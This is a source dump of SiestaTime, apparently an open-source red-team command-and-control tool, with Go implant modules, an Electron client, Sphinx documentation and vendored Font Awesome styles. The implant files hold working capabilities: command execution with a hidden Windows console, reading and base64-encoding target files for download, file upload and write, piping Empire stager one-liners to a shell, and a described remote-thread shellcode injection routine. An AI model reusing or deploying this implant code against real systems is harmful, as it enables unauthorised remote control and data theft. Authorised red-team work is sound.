3 | "version": "0.0.1", 4 | "description": "Red Team Automation tool powered by go and terraform", 5 | "main": "main.js", 6 | "scripts": { 7 | "start": "electron ." 8 | }, 9 | "repository": "https://github.com/rebujacker/SiestaTime", 10 | "keywords": [ 11 | "redteam", 12 | "infraestructure", 13 | "implants" 14 | ], 15 | "author": "Rebujacker", 16 | "license": "GPLv3", 17 | "devDependencies": { 18 | "electron": "^11.1.1" 19 | }, 20 | "dependencies": { 21 | "xterm": "^3.14.4", 22 | "htmlencode": "^0.0.4" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_stacked.scss: -------------------------------------------------------------------------------- 1 | // Stacked Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-stack { 5 | position: relative; 6 | display: inline-block; 7 | width: 2em; 8 | height: 2em; 9 | line-height: 2em; 10 | vertical-align: middle; 11 | } 12 | .#{$fa-css-prefix}-stack-1x, .#{$fa-css-prefix}-stack-2x { 13 | position: absolute; 14 | left: 0; 15 | width: 100%; 16 | text-align: center; 17 | } 18 | .#{$fa-css-prefix}-stack-1x { line-height: inherit; } 19 | .#{$fa-css-prefix}-stack-2x { font-size: 2em; } 20 | .#{$fa-css-prefix}-inverse { color: $fa-inverse; } 21 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/font-awesome.less: -------------------------------------------------------------------------------- 1 | /*! 2 | * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome 3 | * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) 4 | */ 5 | 6 | @import "variables.less"; 7 | @import "mixins.less"; 8 | @import "path.less"; 9 | @import "core.less"; 10 | @import "larger.less"; 11 | @import "fixed-width.less"; 12 | @import "list.less"; 13 | @import "bordered-pulled.less"; 14 | @import "animated.less"; 15 | @import "rotated-flipped.less"; 16 | @import "stacked.less"; 17 | @import "icons.less"; 18 | @import "screen-reader.less"; 19 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/console/console.js: -------------------------------------------------------------------------------- 1 | 2 | $.getScript("./node_modules/xterm/dist/xterm.js"); 3 | $.getScript("./static/lib/scripts/local-echo.js"); 4 | 5 | $(document).ready(function() { 6 | 7 | // Start an xterm.js instance 8 | const term = new Terminal(); 9 | term.open(document.getElementById('terminal')); 10 | 11 | // Create a local echo controller 12 | const localEcho = new LocalEchoController(term); 13 | 14 | // Read a single line from the user 15 | localEcho.read("[bichito]> ") 16 | .then(input => alert(`User entered: ${input}`)) 17 | .catch(error => alert(`Error reading: ${error}`)); 18 | 19 | }); -------------------------------------------------------------------------------- /docs/Makefile: -------------------------------------------------------------------------------- 1 | # Minimal makefile for Sphinx documentation 2 | # 3 | 4 | # You can set these variables from the command line. 5 | SPHINXOPTS = 6 | SPHINXBUILD = sphinx-build 7 | SOURCEDIR = . 8 | BUILDDIR = _build 9 | 10 | # Put it first so that "make" without argument is like "make help". 11 | help: 12 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) 13 | 14 | .PHONY: help Makefile 15 | 16 | # Catch-all target: route all unknown targets to Sphinx using the new 17 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). 18 | %: Makefile 19 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) -------------------------------------------------------------------------------- /docs/hive/jobslogs.rst: -------------------------------------------------------------------------------- 1 | Jobs,Logs 2 | =========================== 3 | 4 | Hive tab will provide all information about jobs processed by Hive and errors caused alongside Hive lifespan. 5 | 6 | 7 | 8 | Jobs 9 | -------------------------------------------- 10 | 11 | .. figure:: ../_static/images/hivestatus/jobs.png 12 | :align: center 13 | :figwidth: 600px 14 | :target: ../_static/images/hivestatus/jobs.png 15 | 16 | 17 | Logs 18 | -------------------------------------------------- 19 | 20 | .. figure:: ../_static/images/hivestatus/logs.png 21 | :align: center 22 | :figwidth: 600px 23 | :target: ../_static/images/hivestatus/logs.png 24 | 25 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/downloadf_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "io/ioutil" 7 | "encoding/base64" 8 | ) 9 | 10 | /* 11 | Description: Download File from Foothold --> Linux and Darwin 12 | Flow: 13 | A.Read target PATH file and return its string 14 | */ 15 | func Download(target string) (bool,string){ 16 | 17 | 18 | // Read file to byte slice 19 | data, err := ioutil.ReadFile(target) 20 | if err != nil { 21 | return true,"Error Reading File: "+err.Error() 22 | } 23 | 24 | result := base64.StdEncoding.EncodeToString(data) 25 | 26 | return false,result 27 | } -------------------------------------------------------------------------------- /.readthedocs.yml: -------------------------------------------------------------------------------- 1 | # .readthedocs.yml 2 | # Read the Docs configuration file 3 | # See https://docs.readthedocs.io/en/stable/config-file/v2.html for details 4 | 5 | # Required 6 | version: 2 7 | 8 | # Build documentation in the docs/ directory with Sphinx 9 | sphinx: 10 | configuration: docs/conf.py 11 | 12 | # Build documentation with MkDocs 13 | #mkdocs: 14 | # configuration: mkdocs.yml 15 | 16 | # Optionally build your docs in additional formats such as PDF 17 | formats: 18 | - pdf 19 | 20 | # Optionally set the version of Python and requirements required to build your docs 21 | python: 22 | version: 3.7 23 | install: 24 | - requirements: docs/requirements.txt -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/writef_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "io/ioutil" 7 | "strings" 8 | ) 9 | 10 | /* 11 | Description: Write to File --> Linux,Darwin,Windows. 12 | Flow: 13 | A.Append input string to target PATH File 14 | */ 15 | func Write(commands string) (bool,string){ 16 | 17 | arguments := strings.Split(commands," ") 18 | if len(arguments) != 2 { 19 | return true,"Incorrect Number of params" 20 | } 21 | 22 | err := ioutil.WriteFile(arguments[0], []byte(arguments[1]), 0666) 23 | if err != nil { 24 | return true,"Error Writing File: "+err.Error() 25 | } 26 | 27 | return false,"File Writed" 28 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_native_darwin.go: -------------------------------------------------------------------------------- 1 | // +build darwin 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "bichito/modules/biterpreter/sysinfo_native_darwin" 7 | ) 8 | 9 | /* 10 | Description: Sysinfo --> Darwin. Retrieve Operating System key information from the foothold. 11 | Flow: 12 | A.Call the Objective C wrapped source (sysinfo_native_darwin.go/sysinfo_native_darwin.m) 13 | A1. Call OSX native libraries (,) to extract information 14 | Note: These libraries need to be extracted from a darwin dev. kit, and are compiled with OSXCROSS 15 | */ 16 | func Sysinfo() (bool,string){ 17 | 18 | error,result := sysinfo_native_darwin.SysinfoNativeDarwin() 19 | return error,result 20 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/logs/logs.js: -------------------------------------------------------------------------------- 1 | getLogs(); 2 | 3 | $(document).ready(function() { 4 | 5 | //Determine id of Job/Log component and load respective jobs/logs 6 | var id = $(".STmain").attr("id"); 7 | $(".STmain").find("#element").text(id); 8 | 9 | 10 | $(".STmain").find(".ltable").empty(); 11 | 12 | //Loop over Logs JSON DB and add Logs related to parent summoning "id" (Bichito ID or "Hive") 13 | for (i = 0; i < logs.length; i++){ 14 | var row = logs[i]; 15 | if ((row.pid == id) || (row.chid == id)){ 16 | $(".STmain").find(".ltable").append(""+htmlencode.htmlEncode(row.time)+""+htmlencode.htmlEncode(row.error)+""); 17 | } 18 | } 19 | 20 | }) -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/inject_Empire_darwin.go: -------------------------------------------------------------------------------- 1 | // +build darwin 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "bytes" 10 | ) 11 | 12 | /* 13 | Description: Inject Empire --> Darwin 14 | Flow: 15 | A.Send Empire string one liner to sh 16 | */ 17 | func InjectEmpire(payload string) (bool,string){ 18 | 19 | var outbuf, errbuf bytes.Buffer 20 | cmd_path := "/bin/sh" 21 | cmd := exec.Command(cmd_path, "-c",payload) 22 | cmd.Stdout = &outbuf 23 | cmd.Stderr = &errbuf 24 | cmd.Start() 25 | stdout := outbuf.String() 26 | stderr := errbuf.String() 27 | if stderr != ""{ 28 | return true,stderr+stdout 29 | } 30 | 31 | return false,stdout+stderr 32 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/exec_linuxdarwin.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "bytes" 10 | ) 11 | 12 | /* 13 | Description: Exec --> Linux and Darwin 14 | Flow: 15 | A.Spawn a sh process, and interprete the provided string 16 | */ 17 | func Exec(commands string) (bool,string){ 18 | 19 | var outbuf, errbuf bytes.Buffer 20 | cmd_path := "/bin/sh" 21 | cmd := exec.Command(cmd_path, "-c",commands) 22 | cmd.Stdout = &outbuf 23 | cmd.Stderr = &errbuf 24 | cmd.Run() 25 | cmd.Wait() 26 | if errbuf.String() != ""{ 27 | return true,errbuf.String()+outbuf.String() 28 | } 29 | 30 | return false,outbuf.String()+errbuf.String() 31 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/inject_Empire_linux.go: -------------------------------------------------------------------------------- 1 | // +build linux 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "bytes" 10 | ) 11 | 12 | /* 13 | Description: Inject Empire --> Windows 14 | Flow: 15 | A.Send Empire string one liner to python interpreter 16 | */ 17 | func InjectEmpire(payload string) (bool,string){ 18 | 19 | var outbuf, errbuf bytes.Buffer 20 | cmd_path := "/bin/sh" 21 | cmd := exec.Command(cmd_path, "-c",payload) 22 | cmd.Stdout = &outbuf 23 | cmd.Stderr = &errbuf 24 | cmd.Start() 25 | stdout := outbuf.String() 26 | stderr := errbuf.String() 27 | if stderr != ""{ 28 | return true,stderr+stdout 29 | } 30 | 31 | return false,stdout+stderr 32 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/uploadf_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "io/ioutil" 7 | "encoding/base64" 8 | ) 9 | 10 | 11 | /* 12 | Description: Upload File to Foothold --> Linux,Darwin,Windows. 13 | Flow: 14 | A.Write parameter string into a file on target PATH 15 | */ 16 | func Upload(target string,blob string) (bool,string){ 17 | 18 | decoded, err := base64.StdEncoding.DecodeString(blob) 19 | if err != nil { 20 | return true,"Error b64 decoding blob: "+err.Error() 21 | } 22 | 23 | err = ioutil.WriteFile(target, []byte(decoded), 0666) 24 | if err != nil { 25 | return true,"Error Writing File: "+err.Error() 26 | } 27 | 28 | return false,"File Uploaded" 29 | } -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/bordered-pulled.less: -------------------------------------------------------------------------------- 1 | // Bordered & Pulled 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-border { 5 | padding: .2em .25em .15em; 6 | border: solid .08em @fa-border-color; 7 | border-radius: .1em; 8 | } 9 | 10 | .@{fa-css-prefix}-pull-left { float: left; } 11 | .@{fa-css-prefix}-pull-right { float: right; } 12 | 13 | .@{fa-css-prefix} { 14 | &.@{fa-css-prefix}-pull-left { margin-right: .3em; } 15 | &.@{fa-css-prefix}-pull-right { margin-left: .3em; } 16 | } 17 | 18 | /* Deprecated as of 4.4.0 */ 19 | .pull-right { float: right; } 20 | .pull-left { float: left; } 21 | 22 | .@{fa-css-prefix} { 23 | &.pull-left { margin-right: .3em; } 24 | &.pull-right { margin-left: .3em; } 25 | } 26 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_bordered-pulled.scss: -------------------------------------------------------------------------------- 1 | // Bordered & Pulled 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-border { 5 | padding: .2em .25em .15em; 6 | border: solid .08em $fa-border-color; 7 | border-radius: .1em; 8 | } 9 | 10 | .#{$fa-css-prefix}-pull-left { float: left; } 11 | .#{$fa-css-prefix}-pull-right { float: right; } 12 | 13 | .#{$fa-css-prefix} { 14 | &.#{$fa-css-prefix}-pull-left { margin-right: .3em; } 15 | &.#{$fa-css-prefix}-pull-right { margin-left: .3em; } 16 | } 17 | 18 | /* Deprecated as of 4.4.0 */ 19 | .pull-right { float: right; } 20 | .pull-left { float: left; } 21 | 22 | .#{$fa-css-prefix} { 23 | &.pull-left { margin-right: .3em; } 24 | &.pull-right { margin-left: .3em; } 25 | } 26 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/rotated-flipped.less: -------------------------------------------------------------------------------- 1 | // Rotated & Flipped Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-rotate-90 { .fa-icon-rotate(90deg, 1); } 5 | .@{fa-css-prefix}-rotate-180 { .fa-icon-rotate(180deg, 2); } 6 | .@{fa-css-prefix}-rotate-270 { .fa-icon-rotate(270deg, 3); } 7 | 8 | .@{fa-css-prefix}-flip-horizontal { .fa-icon-flip(-1, 1, 0); } 9 | .@{fa-css-prefix}-flip-vertical { .fa-icon-flip(1, -1, 2); } 10 | 11 | // Hook for IE8-9 12 | // ------------------------- 13 | 14 | :root .@{fa-css-prefix}-rotate-90, 15 | :root .@{fa-css-prefix}-rotate-180, 16 | :root .@{fa-css-prefix}-rotate-270, 17 | :root .@{fa-css-prefix}-flip-horizontal, 18 | :root .@{fa-css-prefix}-flip-vertical { 19 | filter: none; 20 | } 21 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/inject_Empire_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "bytes" 10 | ) 11 | 12 | /* 13 | Description: Inject Empire --> Linux 14 | Flow: 15 | A.Send Empire string one liner to python interpreter 16 | */ 17 | func InjectEmpire(payload string) (bool,string){ 18 | 19 | var outbuf, errbuf bytes.Buffer 20 | cmd_path := "/usr/bin/python "+payload 21 | cmd := exec.Command(cmd_path) 22 | cmd.Stdout = &outbuf 23 | cmd.Stderr = &errbuf 24 | cmd.Run() 25 | cmd.Wait() 26 | stdout := outbuf.String() 27 | stderr := errbuf.String() 28 | if stderr != ""{ 29 | return true,stderr+stdout 30 | } 31 | 32 | return false,stdout+stderr 33 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_native_darwin/sysinfo_native_darwin.m: -------------------------------------------------------------------------------- 1 | //Commented to avoid cgo compiling errors 2 | /* 3 | #import 4 | #import 5 | #include 6 | 7 | int arch(char * res){ 8 | int n; 9 | NXArchInfo *info = NXGetLocalArchInfo(); 10 | NSString *typeOfCpu = [NSString stringWithUTF8String:info->description]; 11 | char *archch = strdup([typeOfCpu UTF8String]); 12 | n = sprintf(res,"%s",archch); 13 | return n; 14 | } 15 | 16 | int osv(char * res) { 17 | int n; 18 | NSProcessInfo *pInfo = [NSProcessInfo processInfo]; 19 | NSString *version = [pInfo operatingSystemVersionString]; 20 | char *versionch = strdup([version UTF8String]); 21 | n = sprintf(res,"%s",versionch); 22 | return n; 23 | } 24 | 25 | */ -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_rotated-flipped.scss: -------------------------------------------------------------------------------- 1 | // Rotated & Flipped Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-rotate-90 { @include fa-icon-rotate(90deg, 1); } 5 | .#{$fa-css-prefix}-rotate-180 { @include fa-icon-rotate(180deg, 2); } 6 | .#{$fa-css-prefix}-rotate-270 { @include fa-icon-rotate(270deg, 3); } 7 | 8 | .#{$fa-css-prefix}-flip-horizontal { @include fa-icon-flip(-1, 1, 0); } 9 | .#{$fa-css-prefix}-flip-vertical { @include fa-icon-flip(1, -1, 2); } 10 | 11 | // Hook for IE8-9 12 | // ------------------------- 13 | 14 | :root .#{$fa-css-prefix}-rotate-90, 15 | :root .#{$fa-css-prefix}-rotate-180, 16 | :root .#{$fa-css-prefix}-rotate-270, 17 | :root .#{$fa-css-prefix}-flip-horizontal, 18 | :root .#{$fa-css-prefix}-flip-vertical { 19 | filter: none; 20 | } 21 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/readf_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "io/ioutil" 7 | "strings" 8 | ) 9 | 10 | /* 11 | Description: Read Files --> Linux,Darwin and Windows 12 | Flow: 13 | A.Use golang native ioutil library to read target PATH file, return the string content 14 | */ 15 | func Read(commands string) (bool,string){ 16 | 17 | var result string 18 | 19 | arguments := strings.Split(commands," ") 20 | if len(arguments) != 1 { 21 | return true,"Incorrect Number of params" 22 | } 23 | 24 | // Read file to byte slice 25 | data, err := ioutil.ReadFile(arguments[0]) 26 | if err != nil { 27 | return true,"Error Reading File: "+err.Error() 28 | } 29 | 30 | result = string(data) + "\n" 31 | return false,result 32 | } -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_linuxdarwin.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin 2 | 3 | package biterpreter 4 | 5 | import ( 6 | ) 7 | 8 | /* 9 | Description: Migrate:Remote thread injection --> Windows. Inject a donut generated binary shellcode in the memory of another process and create a new thread. 10 | Flow: 11 | A. Will select the x64/x32 version of "migrate_remote_thread_windows" package 12 | B. Decode JSON object, that includes shellcode and PID 13 | C. Prepare C pointers, and call Migrate C++ wrapper 14 | D. C++: 15 | d1. OpenProcess 16 | d2. VirtualAllocEx 17 | d3. WriteProcessMemory 18 | d4. CreateRemoteThread 19 | 20 | E. C++ will return error/success. Error will be from the first windows api error (like cannot access target PID) 21 | 22 | */ 23 | func Migrate(jsonMigrate string) (bool,string){ 24 | 25 | 26 | return false,"Persisted" 27 | } -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/path.less: -------------------------------------------------------------------------------- 1 | /* FONT PATH 2 | * -------------------------- */ 3 | 4 | @font-face { 5 | font-family: 'FontAwesome'; 6 | src: url('@{fa-font-path}/fontawesome-webfont.eot?v=@{fa-version}'); 7 | src: url('@{fa-font-path}/fontawesome-webfont.eot?#iefix&v=@{fa-version}') format('embedded-opentype'), 8 | url('@{fa-font-path}/fontawesome-webfont.woff2?v=@{fa-version}') format('woff2'), 9 | url('@{fa-font-path}/fontawesome-webfont.woff?v=@{fa-version}') format('woff'), 10 | url('@{fa-font-path}/fontawesome-webfont.ttf?v=@{fa-version}') format('truetype'), 11 | url('@{fa-font-path}/fontawesome-webfont.svg?v=@{fa-version}#fontawesomeregular') format('svg'); 12 | // src: url('@{fa-font-path}/FontAwesome.otf') format('opentype'); // used when developing fonts 13 | font-weight: normal; 14 | font-style: normal; 15 | } 16 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_path.scss: -------------------------------------------------------------------------------- 1 | /* FONT PATH 2 | * -------------------------- */ 3 | 4 | @font-face { 5 | font-family: 'FontAwesome'; 6 | src: url('#{$fa-font-path}/fontawesome-webfont.eot?v=#{$fa-version}'); 7 | src: url('#{$fa-font-path}/fontawesome-webfont.eot?#iefix&v=#{$fa-version}') format('embedded-opentype'), 8 | url('#{$fa-font-path}/fontawesome-webfont.woff2?v=#{$fa-version}') format('woff2'), 9 | url('#{$fa-font-path}/fontawesome-webfont.woff?v=#{$fa-version}') format('woff'), 10 | url('#{$fa-font-path}/fontawesome-webfont.ttf?v=#{$fa-version}') format('truetype'), 11 | url('#{$fa-font-path}/fontawesome-webfont.svg?v=#{$fa-version}#fontawesomeregular') format('svg'); 12 | // src: url('#{$fa-font-path}/FontAwesome.otf') format('opentype'); // used when developing fonts 13 | font-weight: normal; 14 | font-style: normal; 15 | } 16 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/animated.less: -------------------------------------------------------------------------------- 1 | // Animated Icons 2 | // -------------------------- 3 | 4 | .@{fa-css-prefix}-spin { 5 | -webkit-animation: fa-spin 2s infinite linear; 6 | animation: fa-spin 2s infinite linear; 7 | } 8 | 9 | .@{fa-css-prefix}-pulse { 10 | -webkit-animation: fa-spin 1s infinite steps(8); 11 | animation: fa-spin 1s infinite steps(8); 12 | } 13 | 14 | @-webkit-keyframes fa-spin { 15 | 0% { 16 | -webkit-transform: rotate(0deg); 17 | transform: rotate(0deg); 18 | } 19 | 100% { 20 | -webkit-transform: rotate(359deg); 21 | transform: rotate(359deg); 22 | } 23 | } 24 | 25 | @keyframes fa-spin { 26 | 0% { 27 | -webkit-transform: rotate(0deg); 28 | transform: rotate(0deg); 29 | } 30 | 100% { 31 | -webkit-transform: rotate(359deg); 32 | transform: rotate(359deg); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_animated.scss: -------------------------------------------------------------------------------- 1 | // Spinning Icons 2 | // -------------------------- 3 | 4 | .#{$fa-css-prefix}-spin { 5 | -webkit-animation: fa-spin 2s infinite linear; 6 | animation: fa-spin 2s infinite linear; 7 | } 8 | 9 | .#{$fa-css-prefix}-pulse { 10 | -webkit-animation: fa-spin 1s infinite steps(8); 11 | animation: fa-spin 1s infinite steps(8); 12 | } 13 | 14 | @-webkit-keyframes fa-spin { 15 | 0% { 16 | -webkit-transform: rotate(0deg); 17 | transform: rotate(0deg); 18 | } 19 | 100% { 20 | -webkit-transform: rotate(359deg); 21 | transform: rotate(359deg); 22 | } 23 | } 24 | 25 | @keyframes fa-spin { 26 | 0% { 27 | -webkit-transform: rotate(0deg); 28 | transform: rotate(0deg); 29 | } 30 | 100% { 31 | -webkit-transform: rotate(359deg); 32 | transform: rotate(359deg); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /docs/make.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | pushd %~dp0 4 | 5 | REM Command file for Sphinx documentation 6 | 7 | if "%SPHINXBUILD%" == "" ( 8 | set SPHINXBUILD=sphinx-build 9 | ) 10 | set SOURCEDIR=. 11 | set BUILDDIR=_build 12 | 13 | if "%1" == "" goto help 14 | 15 | %SPHINXBUILD% >NUL 2>NUL 16 | if errorlevel 9009 ( 17 | echo. 18 | echo.The 'sphinx-build' command was not found. Make sure you have Sphinx 19 | echo.installed, then set the SPHINXBUILD environment variable to point 20 | echo.to the full path of the 'sphinx-build' executable. Alternatively you 21 | echo.may add the Sphinx directory to PATH. 22 | echo. 23 | echo.If you don't have Sphinx installed, grab it from 24 | echo.http://sphinx-doc.org/ 25 | exit /b 1 26 | ) 27 | 28 | %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% 29 | goto end 30 | 31 | :help 32 | %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% 33 | 34 | :end 35 | popd 36 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/accesschk_linuxdarwin.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | "syscall" 9 | ) 10 | 11 | /* 12 | Description: AccessCheck --> Linux and Darwin 13 | Flow: 14 | A.Use Native golang libraries and sys calls to get key operating System data 15 | */ 16 | func Accesschk(filepath string) (bool,string){ 17 | 18 | var result string 19 | 20 | fileInfo, err := os.Stat(filepath) 21 | if err != nil { 22 | return true,"Error Listing stats of file: "+err.Error() 23 | } 24 | 25 | result = "File name ||| Bytes ||| Permissions ||| UID ||| GUID ||| Last Modified\n" 26 | result = result + fmt.Sprintf("%s ||| %d ||| %s ||| %d ||| %d %s \n",fileInfo.Name(),fileInfo.Size(),fileInfo.Mode(), 27 | fileInfo.Sys().(*syscall.Stat_t).Uid,fileInfo.Sys().(*syscall.Stat_t).Gid,fileInfo.ModTime()) 28 | 29 | return false,result 30 | } -------------------------------------------------------------------------------- /docs/resources/vpc.rst: -------------------------------------------------------------------------------- 1 | Virtual Private Cloud 2 | =========================== 3 | 4 | This tab will be used to handle VPC instances that you can save for their late use in deployment of resources. 5 | 6 | 7 | ``VPS --> Add VPS`` 8 | 9 | 10 | AWS 11 | ----------- 12 | 13 | * Inputs 14 | * VPS Name: Resource Name 15 | * VPS Type: ec2 instance type 16 | * Access Key: 17 | * Secret Key: 18 | * Region: `region`_ 19 | * AMI: `ami`_ 20 | * SSH Keyname: EC2 keyname 21 | * SSH Key: EC2 pem key string 22 | 23 | .. figure:: ../_static/images/addresources/addec2vpc.png 24 | :align: center 25 | :figwidth: 600px 26 | :target: ../_static/images/addresources/addec2vpc.png 27 | 28 | Azure 29 | --------------- 30 | 31 | TBD 32 | 33 | 34 | .. _ami: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/finding-an-ami.html 35 | .. _region: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html 36 | 37 | 38 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/exec_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | 4 | package biterpreter 5 | 6 | import ( 7 | 8 | "os/exec" // requirement to execute commands against target system 9 | "syscall" // required to interact with windows OS calls 10 | "bytes" 11 | ) 12 | 13 | /* 14 | Description: Exec --> Windows 15 | Flow: 16 | A.Spawn a cmd process, and interprete the provided string 17 | B.Set the spawn as HideWindow, so the cmd box doesn't appear when spawning cmd 18 | */ 19 | func Exec(commands string) (bool,string){ 20 | 21 | var outbuf,errbuf bytes.Buffer 22 | cmd_path := "C:\\Windows\\System32\\cmd.exe" 23 | cmd := exec.Command(cmd_path, "/c", commands+"\n") 24 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 25 | cmd.Stdout = &outbuf 26 | cmd.Stderr = &errbuf 27 | cmd.Run() 28 | cmd.Wait() 29 | if errbuf.String() != ""{ 30 | return true,errbuf.String()+outbuf.String() 31 | } 32 | 33 | return false,outbuf.String()+errbuf.String() 34 | } -------------------------------------------------------------------------------- /docs/reporting/basicreport.rst: -------------------------------------------------------------------------------- 1 | Basic Reports 2 | =========================== 3 | 4 | 5 | For the moment is just a plain text document, but in the future a more elaborated report will be developed. 6 | 7 | * The reports will have the following strings: 8 | * Report Name 9 | * Report Creation Time 10 | * Every Job Processed by Hive 11 | * Every Job sent to bichitos 12 | * Every command processed through post-exploitation servers (Interactive Sessions per user and time, with their outputs) 13 | 14 | Create Report 15 | -------------------------------------------- 16 | 17 | ``Basic Reports --> Create Report`` 18 | 19 | .. figure:: ../_static/images/reporting/createreport.png 20 | :align: center 21 | :figwidth: 600px 22 | :target: ../_static/images/reporting/createreport.png 23 | 24 | List Reports,Download 25 | -------------------------------------------------- 26 | 27 | Once the report is created it can be downloaded from hive. They will be automatically placed in: ``SiestaTime/installConfig/reports`` -------------------------------------------------------------------------------- /src/client/electronGUI/components/report/report.js: -------------------------------------------------------------------------------- 1 | 2 | $(document).ready(function() { 3 | 4 | 5 | //Determine if elog is for hive,red or bichito, then load the logs for each case 6 | var name = $(".STmain").attr("id"); 7 | 8 | $(".element").text(htmlencode.htmlEncode(name)) 9 | $(".element").attr("value",htmlencode.htmlEncode(name)); 10 | 11 | }) 12 | 13 | /* Craft a Job with the following JSON Object towards client: 14 | 15 | type ReportObject struct { 16 | Name string `json:"name"` 17 | } 18 | */ 19 | 20 | $("#submitdownloadreport").on('click',function() { 21 | 22 | var reportName = $(".element").attr("value"); 23 | 24 | //Create Job to send with two elements 25 | var data = {name:reportName}; 26 | 27 | $.ajax({ 28 | type: "POST", 29 | url: "http://127.0.0.1:8000/report", 30 | data: JSON.stringify(data), 31 | contentType: "application/json; charset=utf-8", 32 | dataType: "json", 33 | success: function (response){ 34 | 35 | } 36 | 37 | }); 38 | 39 | }); -------------------------------------------------------------------------------- /src/client/electronGUI/components/logs/logs.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 |
6 |
7 |
8 |

Logs

9 |
10 |
11 |
12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 |
TimeError
23 |
24 |
25 |
26 |
27 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_remote_thread_windows.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "bichito/modules/biterpreter/migrate_remote_thread_windows" 7 | ) 8 | 9 | /* 10 | Description: Migrate:Remote thread injection --> Windows. Inject a donut generated binary shellcode in the memory of another process and create a new thread. 11 | Flow: 12 | A. Will select the x64/x32 version of "migrate_remote_thread_windows" package 13 | B. Decode JSON object, that includes shellcode and PID 14 | C. Prepare C pointers, and call Migrate C++ wrapper 15 | D. C++: 16 | d1. OpenProcess 17 | d2. VirtualAllocEx 18 | d3. WriteProcessMemory 19 | d4. CreateRemoteThread 20 | 21 | E. C++ will return error/success. Error will be from the first windows api error (like cannot access target PID) 22 | 23 | */ 24 | func Migrate(jsonMigrate string) (bool,string){ 25 | 26 | err,result := migrate_remote_thread_windows.Migrate(jsonMigrate) 27 | if err != false { 28 | return true,result 29 | } 30 | 31 | return false,result 32 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createReport.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Generate Report

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 | 17 | 18 |
19 | 20 |
21 |
22 |
23 |
